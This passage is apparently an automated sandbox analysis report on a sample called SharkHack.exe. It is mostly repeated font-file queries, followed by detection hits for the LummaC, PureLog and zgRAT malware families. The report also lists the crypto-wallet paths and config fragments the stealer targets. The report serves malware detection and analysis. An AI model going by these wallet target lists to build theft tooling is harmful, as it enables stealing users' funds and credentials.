                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7012, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2875564569.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Yara detected zgRAT
                          Source: Yara matchFile source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyMP
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/BinancX
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.00000000014FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                          Source: Yara matchFile source: 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7012, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7012, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4c2dee8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2875564569.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Yara detected zgRAT
                          Source: Yara matchFile source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.SharkHack.exe.4999550.1.raw.unpack, type: UNPACKEDPE
